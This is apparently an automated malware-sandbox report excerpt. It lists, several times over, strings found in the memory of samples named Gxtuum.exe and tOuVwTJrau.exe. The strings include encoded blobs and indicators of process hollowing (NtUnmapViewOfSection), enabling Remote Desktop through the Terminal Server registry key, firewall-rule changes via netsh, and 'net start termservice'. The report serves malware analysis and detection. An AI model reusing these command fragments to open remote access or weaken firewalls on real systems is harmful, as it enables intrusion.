qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe, 00000014.00000002.2274409335.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000014.00000002.2274409335.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe, 00000014.00000000.2270894566.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000014.00000000.2270894566.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe, 00000016.00000000.2859619631.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000016.00000000.2859619631.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe, 00000016.00000002.2862673039.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: net start termservice
Source: Gxtuum.exe, 00000016.00000002.2862673039.0000000000131000.00000002.00000001.01000000.00000008.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: tOuVwTJrau.exe	String found in binary or memory: net start termservice
Source: tOuVwTJrau.exe	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n SIzYUloPwMqZR3k2PB=PvEsKpH5Nea4RI==feI=gUI=TU9obwMydxZUhPulFaypd1tPcUClarHl2e9s ISoYSPhRqui3VSqZLBngQ1xJWRjOK0nJIRxGIpx SW4ZR30OMKp4Vyrc7hPcT yMmsceVJnJMIldBC7LyYh3OR5IrN7fDFmMCscdOxf cwxZOYiL90EOS0ydBTuguUU6PyhOnx7eECw90E8gylp 90zYYPlguUz5zGhY1WCEd1OGIonJIRxLNY=OK0HA7==SVNda RBOepqXm==TU9obwMydxZUhPulFaydcMxhcTOlbKclea9YJN57dtZmeVCtCPSubLRj0Z oX0H=XTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcTU2t4zSWZ2FD0T2pVIElePBVbwMCThDt2I==TU9naxM4ZSHO1OUl1OJdXwMqZXfpdems3O2rcMBne0S5br5UhPoqKJzDNyS2Qr 5CN5=OPVo9MEzZBStXTlNTuMRXzL1ffCl3fOzb71Pej wS6MQ0wNp dICbXvcYOYp5ySgVrh 1T gO40EYxJJRvo0SPPFWTp=XTlNTuMRXzLvefKy3UuPZ2MlOAGgS6MogeldXNEgQhDzdOGE2PKsbLBUZC0tXKMlYeleXM0NRv==0vAqKtr=UyVgWNMwdALlgzKp3eavLqdH1UOz LMQdO9oUyVgWNMwdALlgzKp3eavLqhH1UOz LMQdO9oXS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVMaRbIgQYTyfeOu5xWhcsJedZ5=XzJpXxMndz3heON=PbArMG==PbAsK7==PbArL7==PbAsLG==TVVsacMydzH1dOqk0s==Rbo0ffVoXwowMuGu2PalOUsaLfRbaSkvaRvsLu2mzu6lbXw8LaAgH9s4aRZleVO0zvBcJnU61DWwGE==MaYaPN9tdxG=LaAgH9sCZR2gLuYgGq==Xy9XXNADaBTseuYl6yR=OOVYXME5dBjvefuv3yifeXxn1T2zbKMpdOdoXMHkLPXpeyNgz9==L9==fUhVbwIzdX2gOPFgCPNcMF==fVQ3am==feFoXw0xVUVZWc0lchOgWyy53VSWXKxn1TyzW0H=PvAqKtr4MOi=PvAqKtr4MeG=PvAqKtr4MeK=PvAqKtr4MXW=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule gr
Source: Gxtuum.exe.0.dr	String found in binary or memory: net start termservice
